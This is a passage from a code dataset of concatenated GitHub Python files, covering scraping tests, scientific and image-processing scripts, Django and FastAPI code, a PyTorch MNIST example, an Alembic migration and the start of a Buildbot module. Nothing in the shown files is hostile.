ExpressScriptsScrapingTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.es = ExpressScriptsPDF()\n cls.helpers = Helpers('pdfs')\n url = os.path.join(cls.es.base_url, cls.es.page_route)\n cls.response = cls.helpers._request_links_page(url)\n cls.soup_object = cls.helpers._make_soup(cls.response.text)\n\n def test_makes_successful_get_request_to_express_scripts(cls):\n cls.assertEqual(cls.response.status_code, 200)\n\n def test_get_request_returns_a_webpage(cls):\n cls.assertIn(b'!DOCTYPE html', cls.response.content)\n\n def test_make_soup_from_page(cls): \n cls.assertIsInstance(cls.soup_object, bs4.BeautifulSoup)\n\n def test_find_all_links_in_soup(cls):\n links = cls.helpers._find_all_links_in_soup(cls.soup_object)\n cls.assertTrue(len(links) > 0)\n for link in links:\n cls.assertTrue(type(link) == str)\n\n def test_find_all_document_links_in_list_of_links(cls):\n doc_links = cls.helpers._return_only_pdf_links(cls.soup_object)\n for doc_link in doc_links:\n cls.assertTrue(doc_link[0:5] == 'docs/' and doc_link[-3:] == 'pdf')\n\n\nclass ExpressScriptsFormRequestsTest(unittest.TestCase): \n \n @classmethod\n def setUpClass(cls):\n cls.es = ExpressScriptsPDF()\n cls.helpers = Helpers('pdfs')\n\n url = os.path.join(cls.es.base_url, cls.es.page_route)\n page = cls.helpers._request_links_page(url)\n soup = cls.helpers._make_soup(page.text)\n cls.doc_links = cls.helpers._return_only_pdf_links(soup)\n \n cls.responses = []\n\n for link in cls.doc_links:\n response = cls.helpers._request_document(cls.es.base_url, link, 1000)\n cls.responses.append(response)\n\n def test_prepare_links(cls):\n for doc_link in cls.doc_links:\n cls.assertTrue(doc_link[0:5] == 'docs/' and doc_link[-3:] == 'pdf')\n\n def test_make_time_string(cls):\n time_string = cls.helpers._make_time_string_with_days_offset(1000) \n cls.assertTrue(type(time_string) == str)\n cls.assertTrue(len(time_string) == 29)\n\n def test_make_document_request(cls):\n for response in cls.responses:\n status_code = response.status_code\n cls.assertTrue(status_code == 200 or status_code == 304 or status_code == 404)\n\n def test_create_dict_for_doc_links(cls):\n 
docs_dict = cls.es._create_dict_for_doc_links(cls.responses)\n cls.assertIs(type(docs_dict), dict)\n cls.assertGreater(len(docs_dict), 0)\n\n @unittest.skip('Test of Main method, no need to run this every time.')\n def test_main_method(cls):\n docs_dict = cls.es.main(1000)\n cls.assertIs(type(docs_dict), dict)\n cls.assertGreater(len(docs_dict), 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"janmilosh/pdffer","sub_path":"tests/small/test_get_express_scripts_pdfs.py","file_name":"test_get_express_scripts_pdfs.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8120598123","text":"# %%------------ IMPORT MODULES -----------------------------------------------------------> #\nfrom main_code.well_model.ground_models.FreeFemAnalysis import (\n\n FreeFEMAnalyzer, TimeDependentOptions, MeshOptions, ProblemDefinitionOptions\n\n)\nfrom main_code.support.other.excel_exporter import write_excel_sheet\nfrom main_code.constants import CALCULATION_FOLDER, os\nfrom collections.abc import Iterable\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# %%------------ DEFINE WORKING FOLDERS -----------------------------------------------------------> #\ncalculation_folder = os.path.join(\n\n CALCULATION_FOLDER, \"Pietro PhD Thesis\", \"3 - Model Description\",\n \"FreeFEM Calculation\", \"1 - mesh sensitivity\",\n \"res\", \"calculation folder\"\n\n)\n\nresult_folder = os.path.join(\n\n CALCULATION_FOLDER, \"Pietro PhD Thesis\", \"3 - Model Description\",\n \"FreeFEM Calculation\", \"1 - mesh sensitivity\",\n \"res\", \"results\"\n\n)\n\n\n# %%------------ CALCULATIONS -----------------------------------------------------------> #\na = 4\nDT = 40.\nn_mesh = 2\nm_mesh = 15\nn_save = 500\nresults = dict()\n\nfor time_steps in [10, 50, 100]:\n\n print(\"{} time steps\".format(time_steps))\n\n mo = MeshOptions(\n\n n_points=a * n_mesh, n_points_circle=a * m_mesh * n_mesh, graph_r_ratio=15,\n mesh_path=os.path.join(calculation_folder, \"mesh_out.mesh\"),\n retrieve_mesh=False, add_visualization_mesh=True\n\n )\n\n if n_save > time_steps:\n n_save_real = time_steps\n\n else:\n n_save_real = n_save\n\n pdo = ProblemDefinitionOptions(\n\n grad_rock=0.01, DT=DT,\n time_range=[1e-3, 1000], time_steps=time_steps,\n n_plot=0, n_save=n_save_real\n\n )\n\n tdo = TimeDependentOptions(mesh_options=mo, problem_definition_options=pdo, mesh_only=False)\n ffa = FreeFEMAnalyzer(options=tdo, calculation_folder=calculation_folder)\n gross_result = ffa.calculate()\n\n time_list = list()\n value_list = list()\n\n for line in gross_result:\n\n line_split = line.split(\";\")\n time_list.append(float(line_split[0].strip()))\n value_list.append(float(line_split[1].strip()) / (DT * 2 * np.pi))\n\n results.update({\n\n \"{} time steps\".format(time_steps): {\n\n \"time\": time_list,\n \"value\": value_list\n\n }\n\n })\n\n print(\"{} time steps\".format(time_steps))\n\n\n# %%------------ SAVE RESULTS -----------------------------------------------------------> #\nfile_path = os.path.join(result_folder, \"time-sensitivity.xlsx\")\n\nfor key in results.keys():\n\n dataframe = {\n\n 'Time': {\"unit\": [\"-\"], \"values\": [results[key][\"time\"]]},\n 'value': {\"unit\": [\"-\"], \"values\": [results[key][\"value\"]]},\n\n }\n write_excel_sheet(excel_path=file_path, sheet_name=key, data_frame=dataframe, overwrite=\"hard\")\n\n\n# %%------------ PLOT RESULTS 
-----------------------------------------------------------> #\nkeys_list = list(results.keys())\n\nkeys_list.reverse()\nfor key in keys_list:\n\n plt.plot(results[key][\"time\"], results[key][\"value\"], label=key)\n\nplt.xlabel(\"$t_d$ [-]\")\nplt.ylabel(\"$f$ [-]\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.legend(fontsize=\"8\")\nplt.title(\"Time Step Sensitivity\")\nplt.show()\n","repo_name":"SERGGroup/BHEModel2.0","sub_path":"calculation/Pietro PhD Thesis/3 - Model Description/FreeFEM Calculation/1 - mesh sensitivity/4 - time sensitivity.py","file_name":"4 - time sensitivity.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74577880871","text":"import click\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nfrom tifffile import imread, imwrite\nfrom tqdm import tqdm\n\n\n@click.command()\n@click.option('--dataframe-path', '-d', type=click.Path(exists=True), help=\"Measurements dataframe path (*.csv)\")\n@click.option('--images-directory', '-i', type=click.Path(exists=True), help=\"Directory with images and labels.\")\n@click.option('--metadata-path', '-m', type=click.Path(exists=True), help=\"Image metadata containing columns CUTOFF_488 and CUTOFF_561\")\ndef main(dataframe_path: str, images_directory: str, metadata_path: str) -> None:\n \"\"\"\n Applies threshold given CUTOFFs to select the NM regions.\n \"\"\"\n\n images_directory = Path(images_directory)\n\n df = pd.read_csv(dataframe_path)\n mt = pd.read_csv(metadata_path)\n mt['file'] = mt['FORMATTED'].apply(lambda x: x.replace('.tif', ''))\n mt = mt.set_index('file')[['CUTOFF_488', 'CUTOFF_561']]\n df = df.join(mt, on='file')\n df['selected'] = ((df['SOX2'] > df['CUTOFF_488']) & (df['TBXT'] > df['CUTOFF_561']))\n\n for f, group in tqdm(df.groupby('file'), \"Selecting cells\"):\n p = str(next(images_directory.glob(f'**/{f}_label.tif')))\n n_labels = group['label'].max() + 1\n mapping = np.zeros(n_labels, dtype=int)\n selected = group[group['selected']]['label'].values\n mapping[selected] = selected\n lb = imread(p)\n lb = mapping[lb]\n imwrite(p[:-4] + f'_thold.tif', lb)\n\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"royerlab/zebrahub-paper-hcr-analysis","sub_path":"apply_threshold.py","file_name":"apply_threshold.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"895010546","text":"import os, shutil\nimport numpy as np\nfrom keras.preprocessing import image\nfrom PIL import Image\n\ndef get_paths(directory):\n \"\"\"\n This function creates a list of paths to all images in a given directory (train, test for e.g.)\n \n directory (str): a string of the directory to get the class and image paths from \n \n Author: Chum Mapa\n Date: 2020\n \"\"\"\n buildings_list = os.listdir(directory + '/buildings')\n forest_list = os.listdir(directory + '/forest')\n glacier_list = os.listdir(directory + '/glacier')\n mountain_list = os.listdir(directory + '/mountain')\n sea_list = os.listdir(directory + '/sea')\n street_list = os.listdir(directory + '/street')\n \n buildings_path = [directory + '/buildings/' + img_id for img_id in buildings_list]\n forest_path = [directory + '/forest/' + img_id for img_id in forest_list]\n glacier_path = [directory + '/glacier/' + img_id for img_id in glacier_list]\n mountain_path = [directory + '/mountain/' + img_id for img_id in mountain_list]\n sea_path = [directory 
+ '/sea/' + img_id for img_id in sea_list]\n street_path = [directory + '/street/' + img_id for img_id in street_list]\n \n path_list = buildings_path + forest_path + glacier_path + mountain_path + sea_path + street_path\n \n return path_list\n\n\ndef preprocess_image(path_list):\n \"\"\"\n This function performs preprocessing tasks in order to \n get a list of images ready for input into a lime visualisation \n \n path_list (str): a list of strings of paths to individual images\n \n Author: @marcotcr (github)\n Date: 2020 \n Link: https://github.com/marcotcr/lime/blob/master/doc/notebooks/Tutorial%20-%20Image%20Classification%20Keras.ipynb\n \"\"\"\n output = []\n for img_path in path_list:\n img = image.load_img(img_path, target_size=(299, 299))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = np.divide(x, 255.0)\n output.append(x)\n return np.vstack(output)\n\n","repo_name":"lecritch/Cene-Image-Classification","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15206832749","text":"def next_permut(entry):\r\n m = len(entry)\r\n i = m-1\r\n while(i>0 and entry[i] < entry[i-1]):\r\n i -= 1\r\n if(i==0):\r\n entry.reverse()\r\n return False\r\n k = m - 1\r\n while(entry[k] < entry[i-1]):\r\n k -= 1\r\n entry[i-1], entry[k] = entry[k], entry[i-1]\r\n x = 0\r\n while(i + x < m - 1 -x):\r\n entry[i+x], entry[m-1-x] = entry[m-1-x], entry[i+x]\r\n x += 1\r\n return True\r\n\r\ndef comp_size(s):\r\n tot = 0\r\n last_seen = '%'\r\n for x in xrange(len(s)):\r\n if(s[x] != last_seen):\r\n last_seen = s[x]\r\n tot += 1\r\n return tot\r\n\r\ndef apply_permut(p, s):\r\n k = len(p)\r\n ns = [0]*len(s)\r\n for x in xrange(len(s)):\r\n ns[x] = s[p[x % k] + (x//k)*k]\r\n return ''.join(ns)\r\n\r\nfilename = \"D-small-attempt0.in\"\r\nf = open(filename, 'r')\r\nof = open(\"D-small.out\", 'w')\r\n\r\nN = int(f.readline())\r\n\r\nfor x in xrange(N):\r\n k = int(f.readline())\r\n S = f.readline().strip()\r\n t = 1000000000\r\n p = [i for i in xrange(k)]\r\n t = min(t, comp_size(apply_permut(p, S)))\r\n while(next_permut(p)):\r\n t = min(t, comp_size(apply_permut(p, S)))\r\n print >> of, \"Case #%d: %d\" % (x + 1, t)\r\n\r\n\r\n\r\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/08/44/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"18599006321","text":"# 정수 n 입력받기\nn = input()\n#숫자 1부터 순서대로 말하기. 
3, 6, 9는 -로 대체.\nfor i in range(1, int(n)+1):\n    s = str(i)\n    clap = sum(s.count(d) for d in '369')\n# 정답 출력하기\n    if clap:\n        print('-' * clap)\n    else:\n        print(i)","repo_name":"rkskakdlfem3/TIL","sub_path":"문제풀이/swea 문제풀이/D2/0721/1926_간단한 369게임.py","file_name":"1926_간단한 369게임.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20240861180","text":"#!/usr/bin/python3\n\nn = int(input())\n\n\nmappings = {}\n\nfor i in range(n):\n    old, new = input().split()\n    \n    if old in mappings:\n        mappings[new] = mappings[old]\n        del mappings[old]\n    else:\n        mappings[new] = old\n\nprint(len(mappings))\nfor new, old in mappings.items():\n    print(old, new)\n\n\t \t \t\t \t\t \t \t \t \t\t \t","repo_name":"Mehariwamlake/competitive-Programming","sub_path":"contest-30/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6813554018","text":"from django import forms\nfrom webapp.models import Covid\n\n\nclass logins(forms.Form):\t\n\tusuario=forms.CharField(max_length=10)\n\tcontrasena=forms.CharField(label=\"Password\", widget=forms.PasswordInput, strip=False)\n\nclass FactorRiesgoForm(forms.ModelForm):\n    class Meta:\n        model = Covid\n        #fields='__all__'\n        exclude = ['ID','DECESO'] \n        labels = { \n            'ID': 'ID',\n            'SEXO': 'SEXO',\n            'EDAD': 'EDAD',\n            'NEUMONIA': 'NEUMONIA',\n            'DIABETES': 'DIABETES',\n            'EPOC': 'EPOC',\n            'ASMA': 'ASMA',\n            'INMUSUPR': 'INMUSUPR',\n            'HIPERTENSION': 'HIPERTENSION',\n            'CARDIOVASCULAR': 'CARDIOVASCULAR',\n            'OBESIDAD': 'OBESIDAD',\n            'RENAL_CRONICA': 'RENAL_CRONICA',\n            'TABAQUISMO': 'TABAQUISMO',\n            'COVID':'COVID',\n            'OTRA_COM':'OTRA_COM',\n            'DECESO':'DECESO',\n            \n        }\n        \n","repo_name":"giovannydavila/testprobabilidad","sub_path":"webapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70943524713","text":"import random\nimport pandas as pd\n\nfrom app import app\nfrom app.database import db\nfrom app.database.models.subjects import Subjects\nfrom fastapi import Depends, File, Response\nfrom fastapi_jwt_auth import AuthJWT\n\n\n@app.post(\"/admin/add_subjects\")\nasync def add_subjects(\n    response: Response, Auth: AuthJWT = Depends(), file: bytes = File(...)\n):\n    Auth.jwt_required()\n    \n    try:\n        data = pd.read_excel(file, index_col=None)\n        subjects = data.values.tolist()\n\n        for subjectDetail in subjects:\n            subjectInstance = Subjects()\n            subjectInstance.name = subjectDetail[0]\n            subjectInstance.code = subjectDetail[1]\n\n            try:\n                db.add(subjectInstance)\n                db.commit()\n            except Exception as e:\n                print(e)\n\n        return {\"result\": \"Pass\"}\n    except Exception as e:\n        print(e)\n        return {\"result\": e}\n","repo_name":"himanshuvarandani/Electron-Server","sub_path":"app/routes/admin/add_subjects.py","file_name":"add_subjects.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18206258067","text":"from geometric_features.aggregation.ocean import basins, subbasins, \\\n    antarctic, ice_shelves, ismip6, arctic as arctic_ocean, transport, \\\n    arctic_transport, moc\nfrom geometric_features.aggregation.seaice import arctic as arctic_seaice\n\n\ndef get_aggregator_by_name(region_group):\n    \"\"\"\n    Get a geojson mask file and the appropriate file suffix for the 
given\n region group.\n\n Parameters\n ----------\n region_group : str\n The name of a region group to get mask features for, one of\n 'Antarctic Regions', 'Arctic Ocean Regions', 'Arctic Sea Ice Regions',\n 'Ocean Basins', 'Ice Shelves', 'Ocean Subbasins', 'ISMIP6 Regions',\n 'MOC Basins', 'Transport Transects', or 'Arctic Transport Transects'\n\n Returns\n -------\n function : callable\n An aggregation functions for collecting the features, which takes a\n :py:class:`geometric_features.GeometricFeatures` object as its argument\n\n prefix : str\n A prefix (or suffix) for use in file names that corresponds to the\n region group\n\n date : str\n A date stamp when the regions in ``fc`` were last modified. This date\n can be used to cache masks based on these regions as long as the date\n remains the same.\n \"\"\"\n\n regions = {'Antarctic Regions': {'prefix': 'antarcticRegions',\n 'date': '20230403',\n 'function': antarctic},\n 'Arctic Ocean Regions': {'prefix': 'arcticOceanRegions',\n 'date': '20201130',\n 'function': arctic_ocean},\n 'Arctic Sea Ice Regions': {'prefix': 'arcticSeaIceRegions',\n 'date': '20201130',\n 'function': arctic_seaice},\n 'Ocean Basins': {'prefix': 'oceanBasins',\n 'date': '20200621',\n 'function': basins},\n 'Ice Shelves': {'prefix': 'iceShelves',\n 'date': '20200621',\n 'function': ice_shelves},\n 'Ocean Subbasins': {'prefix': 'oceanSubbasins',\n 'date': '20201123',\n 'function': subbasins},\n 'ISMIP6 Regions': {'prefix': 'ismip6Regions',\n 'date': '20210201',\n 'function': ismip6},\n 'MOC Basins': {'prefix': 'mocBasins',\n 'date': '20210623',\n 'function': moc},\n 'Transport Transects': {'prefix': 'transportTransects',\n 'date': '20210323',\n 'function': transport},\n 'Arctic Transport Transects': {'prefix': 'arcticTransportTransects',\n 'date': '20220926',\n 'function': arctic_transport}}\n\n if region_group not in regions:\n raise ValueError(f'Unknown region group {region_group}')\n\n region = regions[region_group]\n\n prefix = region['prefix']\n date = region['date']\n\n function = region['function']\n\n return function, prefix, date\n","repo_name":"MPAS-Dev/geometric_features","sub_path":"geometric_features/aggregation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"28748365372","text":"\"\"\"Add large object logs.\n\nRevision ID: 1285eea03d23\nRevises: 0a069266ef71\nCreate Date: 2022-09-02 17:46:05.902097+00:00\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"1285eea03d23\"\ndown_revision = \"9f6b44aa0df8\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n comment = \"OID of large object containing log(s).\"\n op.add_column(\n \"activation_instance\",\n sa.Column(\n \"log_id\",\n postgresql.OID(),\n nullable=True,\n comment=comment,\n ),\n )\n\n # Create trigger function to create log_id if that column is null\n op.execute(\n sa.text(\n \"\"\"\ncreate or replace function trfn_create_lobject()\nreturns trigger\nas $$\nbegin\n if new.log_id is null\n then\n select lo_create(0)\n into new.log_id;\n end if;\n\n return new;\nend;\n$$ language plpgsql;\n \"\"\"\n )\n )\n\n # Create trigger function to cascade delete from activation_instance\n # to large object table\n op.execute(\n sa.text(\n \"\"\"\ncreate or replace function trfn_cascade_delete_lobject()\nreturns trigger\nas $$\nbegin\n 
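-- unlink the large objects belonging to the activation_instance rows just deleted\n    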
perform lo_unlink(d.log_id)\n from deleted_records d;\n\n return null;\nend;\n$$ language plpgsql;\n \"\"\"\n )\n )\n\n # Create pre-insert row trigger on activation_instance table\n op.execute(\n sa.text(\n \"\"\"\ncreate trigger tr_activation_instance_log_id\nbefore insert\n on activation_instance\n for each row\n execute function trfn_create_lobject();\n \"\"\"\n )\n )\n\n # Create post-delete statement trigger on activation_instance table\n op.execute(\n sa.text(\n \"\"\"\ncreate trigger tr_activation_instance_cascade_delete_logs\n after delete\n on activation_instance\n referencing old table as deleted_records\n for each statement\n execute function trfn_cascade_delete_lobject();\n \"\"\"\n )\n )\n\n\ndef downgrade() -> None:\n op.drop_column(\"activation_instance\", \"log_id\")\n\n op.execute(\n sa.text(\n \"\"\"\ndrop trigger if exists tr_activation_instance_cascade_delete_logs\n on activation_instance;\n \"\"\"\n )\n )\n\n op.execute(\n sa.text(\n \"\"\"\ndrop trigger if exists tr_activation_instance_log_id\n on activation_instance;\n \"\"\"\n )\n )\n\n op.execute(\n sa.text(\n \"\"\"\ndrop function if exists trfn_cascade_delete_lobject() ;\n \"\"\"\n )\n )\n\n op.execute(\n sa.text(\n \"\"\"\ndrop function if exists trfn_create_lobject() ;\n \"\"\"\n )\n )\n","repo_name":"benthomasson/ansible-events-ui2","sub_path":"src/eda_server/db/migrations/versions/202209191746_1285eea03d23_large_object_logs.py","file_name":"202209191746_1285eea03d23_large_object_logs.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8762348724","text":"#!/usr/bin/env python3\r\n\r\nimport argparse\r\n\r\nfrom belcon_mini_III import DMH\r\n\r\n\r\ndef run_reciprocation_demo(\r\n usbport, num_repeat, speed, direction1, direction2):\r\n \"\"\"Reciprocation movement with some commands.\"\"\"\r\n dmh = DMH(usbport)\r\n\r\n if not dmh.get_status()[0]: # not RUN\r\n dmh.get_set_mode()\r\n\r\n print(\"High speed [Hz/100]: \" +\r\n str(dmh.get_set_parameters(3)))\r\n print(\"Middle speed [Hz/100]: \" +\r\n str(dmh.get_set_parameters(4)))\r\n print(\"Low speed [Hz/100]: \" +\r\n str(dmh.get_set_parameters(5)))\r\n if speed == 'low':\r\n sleep_sec = 30\r\n elif speed == 'middle':\r\n sleep_sec = 15\r\n elif speed == 'high':\r\n sleep_sec = 10\r\n\r\n for i in range(num_repeat):\r\n dmh.move(direction1, speed)\r\n dmh.sleep_with_displaying_freq(sleep_sec)\r\n dmh.stop()\r\n dmh.sleep_with_displaying_freq(1)\r\n\r\n dmh.move(direction2, speed)\r\n dmh.sleep_with_displaying_freq(sleep_sec)\r\n dmh.stop()\r\n dmh.sleep_with_displaying_freq(1)\r\n\r\n dmh.close_connection()\r\n\r\n\r\ndef get_options():\r\n \"\"\"Returns user-specific options.\"\"\"\r\n parser = argparse.ArgumentParser(\r\n description='Set options.')\r\n parser.add_argument(\r\n '--usbport', dest='usbport',\r\n type=str, default=None,\r\n help='set usb port number for the cable')\r\n parser.add_argument(\r\n '--num_repeat', dest='num_repeat',\r\n type=int, default=1,\r\n help='set numbet of reciprocation demo')\r\n parser.add_argument(\r\n '--speed', dest='speed',\r\n type=str, default='low',\r\n choices=['low', 'middle', 'high'],\r\n help='set movement speed')\r\n parser.add_argument(\r\n '--initial_direction', dest='direction',\r\n type=str, default='normal',\r\n choices=['normal', 'reverse'],\r\n help='set a movement direction (initial state)')\r\n return parser.parse_args()\r\n\r\n\r\nif __name__ == '__main__':\r\n args = get_options()\r\n 
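# directions.index(direction1) is 0 or 1; applying 'not' flips it (True == 1,\r\n    # False == 0), so direction2 is always the opposite of direction1\r\n    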
directions = ['normal', 'reverse']\r\n direction1 = args.direction\r\n direction2 = directions[not directions.index(direction1)]\r\n run_reciprocation_demo(\r\n args.usbport,\r\n args.num_repeat,\r\n args.speed,\r\n direction1,\r\n direction2)\r\n","repo_name":"takuya-ki/conveyor_modbus","sub_path":"src/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12925231240","text":"import pyvirtualcam\nimport cv2\n\ndef main():\n camIn = cv2.VideoCapture(0)\n camIn.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)\n camIn.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)\n \n with pyvirtualcam.Camera(width = 1280, height = 720, fps = 30) as camOut:\n print(f'Using virtual camera: {camOut.device}')\n \n while True:\n _, img = camIn.read()\n \n # do image processing here\n \n camOut.send(img)\n camOut.sleep_until_next_frame()\n \nif __name__ == \"__main__\":\n main()","repo_name":"Ttanasart-pt/CSS400","sub_path":"code samples/01_using_pyvirtualcam.py","file_name":"01_using_pyvirtualcam.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74416563112","text":"import torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nfrom torchvision import transforms, datasets\n\nEPOCHS = 3\n\ntrain = datasets.MNIST('',\n train=True,\n download=True,\n transform=transforms.Compose([transforms.ToTensor()]))\n\ntest = datasets.MNIST('',\n train=False,\n download=True,\n transform=transforms.Compose([transforms.ToTensor()]))\n\ntrainset = torch.utils.data.DataLoader(train, batch_size=10, shuffle=True)\ntestset = torch.utils.data.DataLoader(test, batch_size=10, shuffle=True)\n\n\nclass Net(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.fc1 = nn.Linear(784, 64)\n self.fc2 = nn.Linear(64, 64)\n self.fc3 = nn.Linear(64, 64)\n self.fc4 = nn.Linear(64, 10)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = F.relu(self.fc3(x))\n x = self.fc4(x)\n\n return F.log_softmax(x, dim=1)\n\n\nnet = Net()\n\noptimizer = optim.Adam(net.parameters(), lr=0.001)\n\nfor epoch in range(EPOCHS):\n for data in trainset:\n X, y = data\n net.zero_grad()\n output = net(X.view(-1, 28 * 28))\n loss = F.nll_loss(output, y)\n loss.backward()\n optimizer.step()\n print(loss)\n","repo_name":"ralphvw/pytorch","sub_path":"basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15142748971","text":"from django.db import models\nfrom datetime import datetime\n\nDIRECTION_CHOICE = (\n (\"T\", 'Вверх'),\n (\"D\", 'Вниз'),\n (\"N\", 'Без изменений'),\n )\n\n\nclass Valuta(models.Model):\n name_ru = models.CharField(verbose_name=\"Название (RU)\", max_length=100, unique=True)\n name_en = models.CharField(verbose_name=\"Название (EN)\", max_length=100, unique=True)\n char_code = models.CharField(verbose_name=\"Символьный код\", max_length=3, unique=True)\n num_code = models.CharField(verbose_name=\"Числовой код\", max_length=3, unique=True)\n nominal = models.IntegerField(verbose_name=\"Номинал\", default=1)\n description = models.TextField(verbose_name=\"Описание\", max_length=300)\n icon = models.ImageField(verbose_name=\"Иконка\", upload_to='currency/icon/')\n popular = models.BooleanField(verbose_name=\"Популярная 
валюта\", default=False)\n\n def __str__(self):\n return self.name_ru\n\n class Meta:\n verbose_name = \"Валюта\"\n verbose_name_plural = \"Валюты\"\n ordering = [\"name_ru\"]\n\n\nclass ValutaValue(models.Model):\n valuta = models.ForeignKey(Valuta, on_delete=models.CASCADE, verbose_name=\"Валюта\")\n date = models.DateField(verbose_name=\"Дата\")\n direction_change = models.CharField(max_length=1, choices=DIRECTION_CHOICE, default=\"N\",\n verbose_name=\"Направление изменения курса\")\n percent_change = models.FloatField(verbose_name=\"Процентное изменение курса\", default=0.00)\n value = models.FloatField(verbose_name=\"Значение\", default=60.1234)\n\n def save(self, *args, **kwargs):\n last_value = ValutaValue.objects.filter(valuta=self.valuta).first().value\n change_value = self.value - last_value\n self.percent_change = round(change_value/last_value*100, 2)\n if change_value > 0:\n self.direction_change = \"T\"\n elif change_value < 0:\n self.direction_change = \"D\"\n else:\n self.direction_change = \"N\"\n super(ValutaValue, self).save(*args, **kwargs)\n\n class Meta:\n verbose_name = \"Котировка валюты\"\n verbose_name_plural = \"Котировки валют\"\n ordering = [\"-date\"]\n unique_together = (\"valuta\", \"date\")\n","repo_name":"Igordr1999/datter2017","sub_path":"currency/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72737912233","text":"class Solution:\n def countSmaller(self, nums: List[int]) -> List[int]:\n\n sortedNums = list()\n result = list()\n for idx in range(len(nums)-1, -1, -1):\n numSmaller = bisect.bisect_left(sortedNums, nums[idx])\n sortedNums.insert(numSmaller, nums[idx])\n result.append(numSmaller)\n return reversed(result)\n\ndef stringToIntegerList(input):\n return json.loads(input)\n\ndef integerListToString(nums, len_of_list=None):\n if not len_of_list:\n len_of_list = len(nums)\n return json.dumps(nums[:len_of_list])\n\ndef main():\n import sys\n import io\n def readlines():\n for line in io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8'):\n yield line.strip('\\n')\n\n lines = readlines()\n while True:\n try:\n line = next(lines)\n nums = stringToIntegerList(line);\n\n ret = Solution().countSmaller(nums)\n\n out = integerListToString(ret);\n print(out)\n except StopIteration:\n break\n\nif __name__ == '__main__':\n main()\n","repo_name":"AnuKritiW/Coding-Exercises","sub_path":"Count of Smaller Numbers After Self/countSmaller.py","file_name":"countSmaller.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15457839431","text":"import os, shutil, re, weakref\nfrom cPickle import dump\nfrom zope.interface import implements\nfrom twisted.python import log, runtime\nfrom twisted.persisted import styles\nfrom twisted.internet import reactor, defer\nfrom buildbot import interfaces, util, sourcestamp\nfrom buildbot.process.properties import Properties\nfrom buildbot.status.buildstep import BuildStepStatus\n\nclass BuildStatus(styles.Versioned):\n implements(interfaces.IBuildStatus, interfaces.IStatusEvent)\n\n persistenceVersion = 3\n persistenceForgets = ( 'wasUpgraded', )\n\n source = None\n reason = None\n changes = []\n blamelist = []\n progress = None\n started = None\n finished = None\n currentStep = None\n text = []\n results = None\n slavename = \"???\"\n\n # these lists/dicts are defined here so that unserialized 
